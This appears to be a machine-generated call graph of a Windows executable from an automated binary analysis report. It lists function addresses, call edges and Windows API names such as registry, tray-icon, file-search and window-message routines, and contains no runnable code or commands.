95160 7b520c 95158->95160 95161 7b510d 48 API calls 95159->95161 95162 7b52a7 95160->95162 95163 7b5216 95160->95163 95166 823cc5 95161->95166 95164 7b6eed 48 API calls 95162->95164 95165 7b510d 48 API calls 95163->95165 95168 7b5220 _memset _wcscpy 95164->95168 95165->95168 95167 7b518c 48 API calls 95166->95167 95166->95168 95169 823ce7 95167->95169 95170 7b5288 Shell_NotifyIconW 95168->95170 95171 7b518c 48 API calls 95169->95171 95170->95152 95171->95168 95172->94104 95174 7bef2f 95173->95174 95175 7bef1d 95173->95175 95340 7fcc5c 86 API calls 4 library calls 95174->95340 95176 7bef26 95175->95176 95339 7be3b0 335 API calls 2 library calls 95175->95339 95176->94170 95179 8286f9 95179->95179 95181 7bf130 95180->95181 95184 7bfe30 335 API calls 95181->95184 95187 7bf199 95181->95187 95182 7bf3dd 95185 8287c8 95182->95185 95195 7bf3f2 95182->95195 95230 7bf431 Mailbox 95182->95230 95183 7bf595 95191 7bd7f7 48 API calls 95183->95191 95183->95230 95186 828728 95184->95186 95345 7fcc5c 86 API calls 4 library calls 95185->95345 95186->95187 95342 7fcc5c 86 API calls 4 library calls 95186->95342 95187->95182 95187->95183 95193 7bd7f7 48 API calls 95187->95193 95224 7bf229 95187->95224 95188 7bfe30 335 API calls 95188->95230 95192 8287a3 95191->95192 95344 7d0f0a 52 API calls __cinit 95192->95344 95197 828772 95193->95197 95221 7bf418 95195->95221 95346 7f9af1 48 API calls 95195->95346 95196 828b1b 95211 828bcf 95196->95211 95212 828b2c 95196->95212 95343 7d0f0a 52 API calls __cinit 95197->95343 95198 7fcc5c 86 API calls 95198->95230 95199 7bd6e9 55 API calls 95199->95230 95201 7bf770 95207 828a45 95201->95207 95222 7bf77a 95201->95222 95203 828c53 95360 7fcc5c 86 API calls 4 library calls 95203->95360 95204 828810 95347 80eef8 335 API calls 95204->95347 95205 7bfe30 335 API calls 95225 7bf6aa 95205->95225 95206 828b7e 95355 80e40a 335 API calls Mailbox 95206->95355 95352 7cc1af 48 API calls 95207->95352 95357 7fcc5c 86 API calls 4 library calls 95211->95357 95354 80f5ee 335 API calls 95212->95354 95213 828beb 95358 80bdbd 335 API calls Mailbox 95213->95358 95216 7c1b90 48 API calls 95216->95230 95220 7c1b90 48 API calls 95220->95230 95221->95196 95221->95225 95221->95230 95222->95220 95223 828c00 95244 7bf537 Mailbox 95223->95244 95359 7fcc5c 86 API calls 4 library calls 95223->95359 95224->95182 95224->95183 95224->95221 95224->95230 95225->95201 95225->95205 95226 7bfce0 95225->95226 95225->95230 95225->95244 95226->95244 95356 7fcc5c 86 API calls 4 library calls 95226->95356 95227 828823 95227->95221 95229 82884b 95227->95229 95348 80ccdc 48 API calls 95229->95348 95230->95188 95230->95198 95230->95199 95230->95203 95230->95206 95230->95213 95230->95216 95230->95226 95230->95244 95341 7bdd47 48 API calls ___crtGetEnvironmentStringsW 95230->95341 95353 7e97ed InterlockedDecrement 95230->95353 95361 7cc1af 48 API calls 95230->95361 95234 828857 95236 828865 95234->95236 95237 8288aa 95234->95237 95349 7f9b72 48 API calls 95236->95349 95240 8288a0 Mailbox 95237->95240 95350 7fa69d 48 API calls 95237->95350 95238 7bfe30 335 API calls 95238->95244 95240->95238 95242 8288e7 95351 7bbc74 48 API calls 95242->95351 95244->94170 95246 7c479f 95245->95246 95247 7c4637 95245->95247 95250 7bce19 48 API calls 95246->95250 95248 826e05 95247->95248 95249 7c4643 95247->95249 95416 80e822 95248->95416 95415 7c4300 335 API calls ___crtGetEnvironmentStringsW 95249->95415 95257 7c46e4 Mailbox 95250->95257 95253 826e11 95254 7c4739 Mailbox 95253->95254 95456 7fcc5c 86 API calls 4 library calls 95253->95456 95254->94170 95256 7c4659 95256->95253 95256->95254 95256->95257 95260 7b4252 84 API calls 95257->95260 95362 7ffa0c 95257->95362 95403 7f6524 95257->95403 95406 806ff0 95257->95406 95260->95254 95263 82df42 95262->95263 95266 7ce253 95262->95266 95264 82df77 95263->95264 95265 82df59 TranslateAcceleratorW 95263->95265 95265->95266 95266->94170 95268 7cdca3 95267->95268 95270 7cdc71 95267->95270 95268->94170 95269 7cdc96 IsDialogMessageW 95269->95268 95269->95270 95270->95268 95270->95269 95271 82dd1d GetClassLongW 95270->95271 95271->95269 95271->95270 95272->94170 95591 7bbd30 95273->95591 95275 7c3267 95297 7c3313 Mailbox ___crtGetEnvironmentStringsW 95275->95297 95603 7cc36b 86 API calls 95275->95603 95279 7bd645 53 API calls 95279->95297 95280 7fcc5c 86 API calls 95280->95297 95283 7bd6e9 55 API calls 95283->95297 95286 7bfe30 335 API calls 95286->95297 95288 7cc3c3 48 API calls 95288->95297 95289 7bdcae 50 API calls 95289->95297 95292 7be8d0 335 API calls 95292->95297 95293 7cc2d6 48 API calls 95293->95297 95294 7cf4ea 48 API calls 95294->95297 95295 7b6eed 48 API calls 95295->95297 95297->95279 95297->95280 95297->95283 95297->95286 95297->95288 95297->95289 95297->95292 95297->95293 95297->95294 95297->95295 95298 7c3635 Mailbox 95297->95298 95596 7b2b7a 95297->95596 95604 7bd9a0 53 API calls __cinit 95297->95604 95605 7bd8c0 53 API calls 95297->95605 95606 80f320 335 API calls 95297->95606 95607 80f5ee 335 API calls 95297->95607 95608 7b1caa 49 API calls 95297->95608 95609 80cda2 82 API calls Mailbox 95297->95609 95610 7f80e3 53 API calls 95297->95610 95611 7bd764 55 API calls 95297->95611 95612 7fc942 50 API calls 95297->95612 95298->94170 95299->94124 95300->94117 95301->94122 95302->94170 95303->94170 95304->94163 95305->94163 95306->94163 95308 7bfe50 95307->95308 95332 7bfe7e 95307->95332 95309 7cf4ea 48 API calls 95308->95309 95309->95332 95310 7d0f0a 52 API calls __cinit 95310->95332 95311 7c146e 95312 7b6eed 48 API calls 95311->95312 95334 7bffe1 95312->95334 95315 7c0509 95619 7fcc5c 86 API calls 4 library calls 95315->95619 95316 7cf4ea 48 API calls 95316->95332 95318 7b6eed 48 API calls 95318->95332 95319 7c1473 95618 7fcc5c 86 API calls 4 library calls 95319->95618 95320 82a922 95320->94170 95321 82a246 95322 7b6eed 48 API calls 95321->95322 95322->95334 95325 82a873 95325->94170 95326 7bd7f7 48 API calls 95326->95332 95327 82a30e 95327->95334 95616 7e97ed InterlockedDecrement 95327->95616 95329 7e97ed InterlockedDecrement 95329->95332 95330 82a973 95620 7fcc5c 86 API calls 4 library calls 95330->95620 95332->95310 95332->95311 95332->95315 95332->95316 95332->95318 95332->95319 95332->95321 95332->95326 95332->95327 95332->95329 95332->95330 95332->95334 95335 7c15b5 95332->95335 95614 7c1820 335 API calls 2 library calls 95332->95614 95615 7c1d10 59 API calls Mailbox 95332->95615 95333 82a982 95334->94170 95617 7fcc5c 86 API calls 4 library calls 95335->95617 95336->94163 95337->94163 95338->94163 95339->95176 95340->95179 95341->95230 95342->95187 95343->95224 95344->95230 95345->95244 95346->95204 95347->95227 95348->95234 95349->95240 95350->95242 95351->95240 95352->95230 95353->95230 95354->95230 95355->95226 95356->95244 95357->95244 95358->95223 95359->95244 95360->95244 95361->95230 95363 7ffa1c __ftell_nolock 95362->95363 95364 7ffa44 95363->95364 95538 7bd286 48 API calls 95363->95538 95457 7b936c 95364->95457 95367 7ffa5e 95368 7ffb68 95367->95368 95369 7ffa80 95367->95369 95379 7ffb92 95367->95379 95370 7b41a9 136 API calls 95368->95370 95371 7b936c 81 API calls 95369->95371 95372 7ffb79 95370->95372 95376 7ffa8c _wcscpy _wcschr 95371->95376 95373 7ffb8e 95372->95373 95374 7b41a9 136 API calls 95372->95374 95375 7b936c 81 API calls 95373->95375 95373->95379 95374->95373 95377 7ffbc7 95375->95377 95382 7ffab0 _wcscat _wcscpy 95376->95382 95386 7ffade _wcscat 95376->95386 95378 7d1dfc __wsplitpath 47 API calls 95377->95378 95387 7ffbeb _wcscat _wcscpy 95378->95387 95379->95254 95380 7b936c 81 API calls 95381 7ffafc _wcscpy 95380->95381 95539 7f72cb GetFileAttributesW 95381->95539 95384 7b936c 81 API calls 95382->95384 95384->95386 95385 7ffb1c __wsetenvp 95385->95379 95388 7b936c 81 API calls 95385->95388 95386->95380 95390 7b936c 81 API calls 95387->95390 95389 7ffb48 95388->95389 95540 7f60dd 77 API calls 4 library calls 95389->95540 95393 7ffc82 95390->95393 95392 7ffb5c 95392->95379 95477 7f690b 95393->95477 95395 7ffca2 95396 7f6524 3 API calls 95395->95396 95397 7ffcb1 95396->95397 95398 7b936c 81 API calls 95397->95398 95400 7ffce2 95397->95400 95399 7ffccb 95398->95399 95483 7fbfa4 95399->95483 95402 7b4252 84 API calls 95400->95402 95402->95379 95578 7f6ca9 GetFileAttributesW 95403->95578 95407 7b936c 81 API calls 95406->95407 95408 80702a 95407->95408 95409 7bb470 91 API calls 95408->95409 95410 80703a 95409->95410 95411 80705f 95410->95411 95412 7bfe30 335 API calls 95410->95412 95414 807063 95411->95414 95582 7bcdb9 48 API calls 95411->95582 95412->95411 95414->95254 95415->95256 95417 80e868 95416->95417 95418 80e84e 95416->95418 95584 80ccdc 48 API calls 95417->95584 95583 7fcc5c 86 API calls 4 library calls 95418->95583 95421 80e871 95422 7bfe30 334 API calls 95421->95422 95423 80e8cf 95422->95423 95424 80e96a 95423->95424 95426 80e916 95423->95426 95439 80e860 Mailbox 95423->95439 95425 80e978 95424->95425 95430 80e9c7 95424->95430 95586 7fa69d 48 API calls 95425->95586 95585 7f9b72 48 API calls 95426->95585 95429 80e949 95433 7c45e0 334 API calls 95429->95433 95431 7b936c 81 API calls 95430->95431 95430->95439 95434 80e9e1 95431->95434 95432 80e99b 95587 7bbc74 48 API calls 95432->95587 95433->95439 95436 7bbdfa 48 API calls 95434->95436 95438 80ea05 CharUpperBuffW 95436->95438 95437 80e9a3 Mailbox 95441 7c3200 334 API calls 95437->95441 95440 80ea1f 95438->95440 95439->95253 95442 80ea72 95440->95442 95445 80ea26 95440->95445 95441->95439 95443 7b936c 81 API calls 95442->95443 95444 80ea7a 95443->95444 95589 7b1caa 49 API calls 95444->95589 95588 7f9b72 48 API calls 95445->95588 95448 80ea54 95449 7c45e0 334 API calls 95448->95449 95449->95439 95450 80ea84 95450->95439 95451 7b936c 81 API calls 95450->95451 95452 80ea9f 95451->95452 95590 7bbc74 48 API calls 95452->95590 95454 80eaaf 95455 7c3200 334 API calls 95454->95455 95455->95439 95456->95254 95458 7b9384 95457->95458 95470 7b9380 95457->95470 95459 824cbd __i64tow 95458->95459 95460 7b9398 95458->95460 95461 824bbf 95458->95461 95469 7b93b0 __itow Mailbox _wcscpy 95458->95469 95541 7d172b 80 API calls 4 library calls 95460->95541 95463 824ca5 95461->95463 95464 824bc8 95461->95464 95542 7d172b 80 API calls 4 library calls 95463->95542 95468 824be7 95464->95468 95464->95469 95465 7cf4ea 48 API calls 95467 7b93ba 95465->95467 95467->95470 95472 7bce19 48 API calls 95467->95472 95471 7cf4ea 48 API calls 95468->95471 95469->95465 95470->95367 95473 824c04 95471->95473 95472->95470 95474 7cf4ea 48 API calls 95473->95474 95475 824c2a 95474->95475 95475->95470 95476 7bce19 48 API calls 95475->95476 95476->95470 95478 7f6918 _wcschr __ftell_nolock 95477->95478 95479 7f692e _wcscat _wcscpy 95478->95479 95480 7d1dfc __wsplitpath 47 API calls 95478->95480 95479->95395 95481 7f695d 95480->95481 95482 7d1dfc __wsplitpath 47 API calls 95481->95482 95482->95479 95484 7fbfb1 __ftell_nolock 95483->95484 95485 7cf4ea 48 API calls 95484->95485 95486 7fc00e 95485->95486 95487 7b47b7 48 API calls 95486->95487 95488 7fc018 95487->95488 95489 7fbdb4 GetSystemTimeAsFileTime 95488->95489 95490 7fc023 95489->95490 95491 7b4517 83 API calls 95490->95491 95492 7fc036 _wcscmp 95491->95492 95493 7fc05a 95492->95493 95494 7fc107 95492->95494 95538->95364 95539->95385 95540->95392 95541->95469 95542->95469 95579 7f6cc4 FindFirstFileW 95578->95579 95581 7f6529 95578->95581 95580 7f6cd9 FindClose 95579->95580 95579->95581 95580->95581 95581->95254 95582->95414 95583->95439 95584->95421 95585->95429 95586->95432 95587->95437 95588->95448 95589->95450 95590->95454 95592 7bbd3f 95591->95592 95595 7bbd5a 95591->95595 95593 7bbdfa 48 API calls 95592->95593 95594 7bbd47 CharUpperBuffW 95593->95594 95594->95595 95595->95275 95597 7b2b8b 95596->95597 95598 82436a 95596->95598 95599 7cf4ea 48 API calls 95597->95599 95600 7b2b92 95599->95600 95601 7b2bb3 95600->95601 95613 7b2bce 48 API calls 95600->95613 95601->95297 95603->95297 95604->95297 95605->95297 95606->95297 95607->95297 95608->95297 95609->95297 95610->95297 95611->95297 95612->95297 95613->95601 95614->95332 95615->95332 95616->95334 95617->95334 95618->95325 95619->95320 95620->95333 95622 7b513f __wsetenvp 95621->95622 95623 821b27 95622->95623 95624 7b5151 95622->95624 95626 7b6b4a 48 API calls 95623->95626 95625 7bbb85 48 API calls 95624->95625 95627 7b515e ___crtGetEnvironmentStringsW 95625->95627 95628 821b34 95626->95628 95627->94193 95629 7cee75 48 API calls 95628->95629 95630 821b57 ___crtGetEnvironmentStringsW 95629->95630 95632 7bb392 95631->95632 95633 7bb3c5 ___crtGetEnvironmentStringsW 95631->95633 95632->95633 95634 7bb3b8 95632->95634 95635 7bb3fd 95632->95635 95633->94202 95633->95633 95636 7bbb85 48 API calls 95634->95636 95637 7cf4ea 48 API calls 95635->95637 95636->95633 95638 7bb407 95637->95638 95639 7cf4ea 48 API calls 95638->95639 95639->95633 95640->94203 95641 829c06 95652 7cd3be 95641->95652 95643 829c1c 95645 829c91 Mailbox 95643->95645 95661 7b1caa 49 API calls 95643->95661 95646 7c3200 335 API calls 95645->95646 95647 829cc5 95646->95647 95649 82a7ab Mailbox 95647->95649 95663 7fcc5c 86 API calls 4 library calls 95647->95663 95650 829c71 95650->95647 95662 7fb171 48 API calls 95650->95662 95653 7cd3dc 95652->95653 95654 7cd3ca 95652->95654 95655 7cd40b 95653->95655 95656 7cd3e2 95653->95656 95664 7bdcae 50 API calls Mailbox 95654->95664 95665 7bdcae 50 API calls Mailbox 95655->95665 95658 7cf4ea 48 API calls 95656->95658 95660 7cd3d4 95658->95660 95660->95643 95661->95650 95662->95645 95663->95649 95664->95660 95665->95660 95666 8219ba 95671 7cc75a 95666->95671 95670 8219c9 95672 7bd7f7 48 API calls 95671->95672 95673 7cc7c8 95672->95673 95679 7cd26c 95673->95679 95675 7cc865 95677 7cc881 95675->95677 95682 7cd1fa 48 API calls ___crtGetEnvironmentStringsW 95675->95682 95678 7d0f0a 52 API calls __cinit 95677->95678 95678->95670 95683 7cd298 95679->95683 95682->95675 95684 7cd28b 95683->95684 95685 7cd2a5 95683->95685 95684->95675 95685->95684 95686 7cd2ac RegOpenKeyExW 95685->95686 95686->95684 95687 7cd2c6 RegQueryValueExW 95686->95687 95688 7cd2fc RegCloseKey 95687->95688 95689 7cd2e7 95687->95689 95688->95684 95689->95688 95690 149c660 95704 149a2b0 95690->95704 95692 149c739 95708 149c550 95692->95708 95705 149a2c2 95704->95705 95711 149d760 GetPEB 95705->95711 95707 149a93b 95707->95692 95709 149c559 Sleep 95708->95709 95710 149c567 95709->95710 95712 149d78a 95711->95712 95712->95707 95713 7b3742 95714 7b374b 95713->95714 95715 7b3769 95714->95715 95716 7b37c8 95714->95716 95754 7b37c6 95714->95754 95720 7b382c PostQuitMessage 95715->95720 95721 7b3776 95715->95721 95718 821e00 95716->95718 95719 7b37ce 95716->95719 95717 7b37ab DefWindowProcW 95722 7b37b9 95717->95722 95768 7b2ff6 16 API calls 95718->95768 95723 7b37d3 95719->95723 95724 7b37f6 SetTimer RegisterWindowMessageW 95719->95724 95720->95722 95726 821e88 95721->95726 95727 7b3781 95721->95727 95729 821da3 95723->95729 95730 7b37da KillTimer 95723->95730 95724->95722 95732 7b381f CreatePopupMenu 95724->95732 95773 7f4ddd 60 API calls _memset 95726->95773 95733 7b3789 95727->95733 95734 7b3836 95727->95734 95739 821da8 95729->95739 95740 821ddc MoveWindow 95729->95740 95765 7b3847 Shell_NotifyIconW _memset 95730->95765 95731 821e27 95769 7ce312 335 API calls Mailbox 95731->95769 95732->95722 95735 821e6d 95733->95735 95736 7b3794 95733->95736 95758 7ceb83 95734->95758 95735->95717 95772 7ea5f3 48 API calls 95735->95772 95743 7b379f 95736->95743 95744 821e58 95736->95744 95737 821e9a 95737->95717 95737->95722 95745 821dcb SetFocus 95739->95745 95746 821dac 95739->95746 95740->95722 95743->95717 95770 7b3847 Shell_NotifyIconW _memset 95743->95770 95771 7f55bd 70 API calls _memset 95744->95771 95745->95722 95746->95743 95748 821db5 95746->95748 95747 7b37ed 95766 7b390f DeleteObject DestroyWindow Mailbox 95747->95766 95767 7b2ff6 16 API calls 95748->95767 95753 821e68 95753->95722 95754->95717 95756 821e4c 95757 7b4ffc 67 API calls 95756->95757 95757->95754 95759 7cec1c 95758->95759 95760 7ceb9a _memset 95758->95760 95759->95722 95761 7b51af 50 API calls 95760->95761 95763 7cebc1 95761->95763 95762 7cec05 KillTimer SetTimer 95762->95759 95763->95762 95764 823c7a Shell_NotifyIconW 95763->95764 95764->95762 95765->95747 95766->95722 95767->95722 95768->95731 95769->95743 95770->95756 95771->95753 95772->95754 95773->95737 95774 8219cb 95779 7b2322 95774->95779 95776 8219d1 95812 7d0f0a 52 API calls __cinit 95776->95812 95778 8219db 95780 7b2344 95779->95780 95813 7b26df 95780->95813 95785 7bd7f7 48 API calls 95786 7b2384 95785->95786 95787 7bd7f7 48 API calls 95786->95787 95788 7b238e 95787->95788 95789 7bd7f7 48 API calls 95788->95789 95790 7b2398 95789->95790 95791 7bd7f7 48 API calls 95790->95791 95792 7b23de 95791->95792 95793 7bd7f7 48 API calls 95792->95793 95794 7b24c1 95793->95794 95821 7b263f 95794->95821 95798 7b24f1 95799 7bd7f7 48 API calls 95798->95799 95800 7b24fb 95799->95800 95850 7b2745 95800->95850 95802 7b2546 95803 7b2556 GetStdHandle 95802->95803 95804 7b25b1 95803->95804 95805 82501d 95803->95805 95807 7b25b7 CoInitialize 95804->95807 95805->95804 95806 825026 95805->95806 95857 7f92d4 53 API calls 95806->95857 95807->95776 95809 82502d 95858 7f99f9 CreateThread 95809->95858 95811 825039 CloseHandle 95811->95807 95812->95778 95859 7b2854 95813->95859 95816 7b6a63 48 API calls 95817 7b234a 95816->95817 95818 7b272e 95817->95818 95873 7b27ec 6 API calls 95818->95873 95820 7b237a 95820->95785 95822 7bd7f7 48 API calls 95821->95822 95823 7b264f 95822->95823 95824 7bd7f7 48 API calls 95823->95824 95825 7b2657 95824->95825 95874 7b26a7 95825->95874 95828 7b26a7 48 API calls 95829 7b2667 95828->95829 95830 7bd7f7 48 API calls 95829->95830 95831 7b2672 95830->95831 95832 7cf4ea 48 API calls 95831->95832 95833 7b24cb 95832->95833 95834 7b22a4 95833->95834 95835 7b22b2 95834->95835 95836 7bd7f7 48 API calls 95835->95836 95837 7b22bd 95836->95837 95838 7bd7f7 48 API calls 95837->95838 95839 7b22c8 95838->95839 95840 7bd7f7 48 API calls 95839->95840 95841 7b22d3 95840->95841 95842 7bd7f7 48 API calls 95841->95842 95843 7b22de 95842->95843 95844 7b26a7 48 API calls 95843->95844 95845 7b22e9 95844->95845 95846 7cf4ea 48 API calls 95845->95846 95847 7b22f0 95846->95847 95848 7b22f9 RegisterWindowMessageW 95847->95848 95849 821fe7 95847->95849 95848->95798 95851 7b2755 95850->95851 95852 825f4d 95850->95852 95853 7cf4ea 48 API calls 95851->95853 95879 7fc942 50 API calls 95852->95879 95855 7b275d 95853->95855 95855->95802 95856 825f58 95857->95809 95858->95811 95880 7f99df 54 API calls 95858->95880 95866 7b2870 95859->95866 95862 7b2870 48 API calls 95863 7b2864 95862->95863 95864 7bd7f7 48 API calls 95863->95864 95865 7b2716 95864->95865 95865->95816 95867 7bd7f7 48 API calls 95866->95867 95868 7b287b 95867->95868 95869 7bd7f7 48 API calls 95868->95869 95870 7b2883 95869->95870 95871 7bd7f7 48 API calls 95870->95871 95872 7b285c 95871->95872 95872->95862 95873->95820 95875 7bd7f7 48 API calls 95874->95875 95876 7b26b0 95875->95876 95877 7bd7f7 48 API calls 95876->95877 95878 7b265f 95877->95878 95878->95828 95879->95856 95881 82197b 95886 7cdd94 95881->95886 95885 82198a 95887 7cf4ea 48 API calls 95886->95887 95888 7cdd9c 95887->95888 95889 7cddb0 95888->95889 95894 7cdf3d 95888->95894 95893 7d0f0a 52 API calls __cinit 95889->95893 95893->95885 95895 7cdf46 95894->95895 95897 7cdda8 95894->95897 95926 7d0f0a 52 API calls __cinit 95895->95926 95898 7cddc0 95897->95898 95899 7bd7f7 48 API calls 95898->95899 95900 7cddd7 GetVersionExW 95899->95900 95901 7b6a63 48 API calls 95900->95901 95902 7cde1a 95901->95902 95927 7cdfb4 95902->95927 95905 7b6571 48 API calls 95910 7cde2e 95905->95910 95908 8224c8 95909 7cdea4 GetCurrentProcess 95940 7cdf5f LoadLibraryA GetProcAddress 95909->95940 95910->95908 95931 7cdf77 95910->95931 95912 7cdf31 GetSystemInfo 95915 7cdf0e 95912->95915 95913 7cdee3 95934 7ce00c 95913->95934 95914 7cdebb 95914->95912 95914->95913 95917 7cdf1c FreeLibrary 95915->95917 95918 7cdf21 95915->95918 95917->95918 95918->95889 95920 7cdf29 GetSystemInfo 95922 7cdf03 95920->95922 95921 7cdef9 95937 7cdff4 95921->95937 95922->95915 95925 7cdf09 FreeLibrary 95922->95925 95925->95915 95926->95897 95928 7cdfbd 95927->95928 95929 7bb18b 48 API calls 95928->95929 95930 7cde22 95929->95930 95930->95905 95941 7cdf89 95931->95941 95945 7ce01e 95934->95945 95938 7ce00c 2 API calls 95937->95938 95939 7cdf01 GetNativeSystemInfo 95938->95939 95939->95922 95940->95914 95942 7cdea0 95941->95942 95943 7cdf92 LoadLibraryA 95941->95943 95942->95909 95942->95914 95943->95942 95944 7cdfa3 GetProcAddress 95943->95944 95944->95942 95946 7cdef1 95945->95946 95947 7ce027 LoadLibraryA 95945->95947 95946->95920 95946->95921 95947->95946 95948 7ce038 GetProcAddress 95947->95948 95948->95946 95949 828eb8 95953 7fa635 95949->95953 95951 828ec3 95952 7fa635 84 API calls 95951->95952 95952->95951 95957 7fa642 95953->95957 95963 7fa66f 95953->95963 95954 7fa671 95965 7cec4e 81 API calls 95954->95965 95955 7fa676 95958 7b936c 81 API calls 95955->95958 95957->95954 95957->95955 95961 7fa669 95957->95961 95957->95963 95959 7fa67d 95958->95959 95960 7b510d 48 API calls 95959->95960 95960->95963 95964 7c4525 61 API calls ___crtGetEnvironmentStringsW 95961->95964 95963->95951 95964->95963 95965->95955 95966 7bf030 95969 7c3b70 95966->95969 95968 7bf03c 95970 7c3bc8 95969->95970 95982 7c42a5 95969->95982 95971 7c3bef 95970->95971 95973 826fd1 95970->95973 95976 826f7e 95970->95976 95983 826f9b 95970->95983 95972 7cf4ea 48 API calls 95971->95972 95974 7c3c18 95972->95974 96049 80ceca 335 API calls Mailbox 95973->96049 95977 7cf4ea 48 API calls 95974->95977 95976->95971 95978 826f87 95976->95978 96001 7c3c2c __wsetenvp ___crtGetEnvironmentStringsW 95977->96001 96046 80d552 335 API calls Mailbox 95978->96046 95979 826fbe 96048 7fcc5c 86 API calls 4 library calls 95979->96048 96061 7fcc5c 86 API calls 4 library calls 95982->96061 95983->95979 96047 80da0e 335 API calls 2 library calls 95983->96047 95984 7c42f2 96068 7fcc5c 86 API calls 4 library calls 95984->96068 95987 8273b0 95987->95968 95988 827297 96057 7fcc5c 86 API calls 4 library calls 95988->96057 95989 82737a 96067 7fcc5c 86 API calls 4 library calls 95989->96067 95994 82707e 96050 7fcc5c 86 API calls 4 library calls 95994->96050 95996 7cdce0 53 API calls 95996->96001 95997 7c40df 96058 7fcc5c 86 API calls 4 library calls 95997->96058 95998 7bd6e9 55 API calls 95998->96001 96001->95982 96001->95984 96001->95988 96001->95989 96001->95994 96001->95996 96001->95997 96001->95998 96002 7bd645 53 API calls 96001->96002 96005 8272d2 96001->96005 96008 827350 96001->96008 96009 8272e9 96001->96009 96010 827363 96001->96010 96014 7b6a63 48 API calls 96001->96014 96016 7cc050 48 API calls 96001->96016 96017 7bfe30 335 API calls 96001->96017 96018 82714c 96001->96018 96019 7bd286 48 API calls 96001->96019 96020 7cf4ea 48 API calls 96001->96020 96022 7c3f2b 96001->96022 96023 82733f 96001->96023 96027 7cee75 48 API calls 96001->96027 96028 7b6eed 48 API calls 96001->96028 96031 8271e1 96001->96031 96041 7bd9a0 53 API calls __cinit 96001->96041 96042 7bd83d 53 API calls 96001->96042 96043 7bcdb9 48 API calls 96001->96043 96044 7cc15c 48 API calls 96001->96044 96045 7cbecb 335 API calls 96001->96045 96051 7bdcae 50 API calls Mailbox 96001->96051 96052 80ccdc 48 API calls 96001->96052 96053 7fa1eb 50 API calls 96001->96053 96002->96001 96059 7fcc5c 86 API calls 4 library calls 96005->96059 96065 7fcc5c 86 API calls 4 library calls 96008->96065 96060 7fcc5c 86 API calls 4 library calls 96009->96060 96066 7fcc5c 86 API calls 4 library calls 96010->96066 96014->96001 96016->96001 96017->96001 96054 80ccdc 48 API calls 96018->96054 96019->96001 96020->96001 96022->95968 96064 7fcc5c 86 API calls 4 library calls 96023->96064 96026 8271a1 96056 7cc15c 48 API calls 96026->96056 96027->96001 96028->96001 96031->96022 96063 7fcc5c 86 API calls 4 library calls 96031->96063 96034 82715f 96034->96026 96055 80ccdc 48 API calls 96034->96055 96035 8271ce 96036 7cc050 48 API calls 96035->96036 96038 8271d6 96036->96038 96037 8271ab 96037->95982 96037->96035 96038->96031 96039 827313 96038->96039 96062 7fcc5c 86 API calls 4 library calls 96039->96062 96041->96001 96042->96001 96043->96001 96044->96001 96045->96001 96046->96022 96047->95979 96048->95973 96049->96001 96050->96022 96051->96001 96052->96001 96053->96001 96054->96034 96055->96034 96056->96037 96057->95997 96058->96022 96059->96009 96060->96022 96061->96022 96062->96022 96063->96022 96064->96022 96065->96022 96066->96022 96067->96022 96068->95987 96069 7bef80 96070 7c3b70 335 API calls 96069->96070 96071 7bef8c 96070->96071 96072 829bec 96109 7c0ae0 Mailbox ___crtGetEnvironmentStringsW 96072->96109 96074 7c1526 Mailbox 96164 7fcc5c 86 API calls 4 library calls 96074->96164 96077 7cf4ea 48 API calls 96102 7bfec8 96077->96102 96078 7c146e 96085 7b6eed 48 API calls 96078->96085 96081 7c0509 96167 7fcc5c 86 API calls 4 library calls 96081->96167 96082 7c1473 96166 7fcc5c 86 API calls 4 library calls 96082->96166 96084 7b6eed 48 API calls 96084->96102 96103 7bffe1 Mailbox 96085->96103 96087 82a922 96088 82a246 96090 7b6eed 48 API calls 96088->96090 96090->96103 96092 82a873 96093 7bd7f7 48 API calls 96093->96102 96094 7e97ed InterlockedDecrement 96094->96102 96095 82a30e 96095->96103 96162 7e97ed InterlockedDecrement 96095->96162 96096 7d0f0a 52 API calls __cinit 96096->96102 96097 7bce19 48 API calls 96097->96109 96099 82a973 96168 7fcc5c 86 API calls 4 library calls 96099->96168 96101 82a982 96102->96077 96102->96078 96102->96081 96102->96082 96102->96084 96102->96088 96102->96093 96102->96094 96102->96095 96102->96096 96102->96099 96102->96103 96104 7c15b5 96102->96104 96159 7c1820 335 API calls 2 library calls 96102->96159 96160 7c1d10 59 API calls Mailbox 96102->96160 96165 7fcc5c 86 API calls 4 library calls 96104->96165 96105 80e822 335 API calls 96105->96109 96106 7bfe30 335 API calls 96106->96109 96107 82a706 96163 7fcc5c 86 API calls 4 library calls 96107->96163 96109->96074 96109->96097 96109->96102 96109->96103 96109->96105 96109->96106 96109->96107 96110 7cf4ea 48 API calls 96109->96110 96111 7e97ed InterlockedDecrement 96109->96111 96112 806ff0 335 API calls 96109->96112 96115 810d09 96109->96115 96118 810d1d 96109->96118 96121 80f0ac 96109->96121 96153 7fa6ef 96109->96153 96161 80ef61 82 API calls 2 library calls 96109->96161 96110->96109 96111->96109 96112->96109 96169 80f8ae 96115->96169 96117 810d19 96117->96109 96119 80f8ae 129 API calls 96118->96119 96120 810d2d 96119->96120 96120->96109 96122 7bd7f7 48 API calls 96121->96122 96123 80f0c0 96122->96123 96124 7bd7f7 48 API calls 96123->96124 96125 80f0c8 96124->96125 96126 7bd7f7 48 API calls 96125->96126 96127 80f0d0 96126->96127 96128 7b936c 81 API calls 96127->96128 96152 80f0de 96128->96152 96129 7b6a63 48 API calls 96129->96152 96130 7bc799 48 API calls 96130->96152 96131 80f2cc 96132 80f2f9 Mailbox 96131->96132 96271 7b6b68 48 API calls 96131->96271 96132->96109 96133 80f2b3 96135 7b518c 48 API calls 96133->96135 96138 80f2c0 96135->96138 96136 80f2ce 96139 7b518c 48 API calls 96136->96139 96137 7b6eed 48 API calls 96137->96152 96140 7b510d 48 API calls 96138->96140 96141 80f2dd 96139->96141 96140->96131 96143 7b510d 48 API calls 96141->96143 96142 7bbdfa 48 API calls 96145 80f175 CharUpperBuffW 96142->96145 96143->96131 96144 7bbdfa 48 API calls 96146 80f23a CharUpperBuffW 96144->96146 96147 7bd645 53 API calls 96145->96147 96270 7cd922 55 API calls 2 library calls 96146->96270 96147->96152 96149 7b936c 81 API calls 96149->96152 96150 7b518c 48 API calls 96150->96152 96151 7b510d 48 API calls 96151->96152 96152->96129 96152->96130 96152->96131 96152->96132 96152->96133 96152->96136 96152->96137 96152->96142 96152->96144 96152->96149 96152->96150 96152->96151 96154 7fa6fb 96153->96154 96155 7cf4ea 48 API calls 96154->96155 96156 7fa709 96155->96156 96157 7fa717 96156->96157 96158 7bd7f7 48 API calls 96156->96158 96157->96109 96158->96157 96159->96102 96160->96102 96161->96109 96162->96103 96163->96074 96164->96103 96165->96103 96166->96092 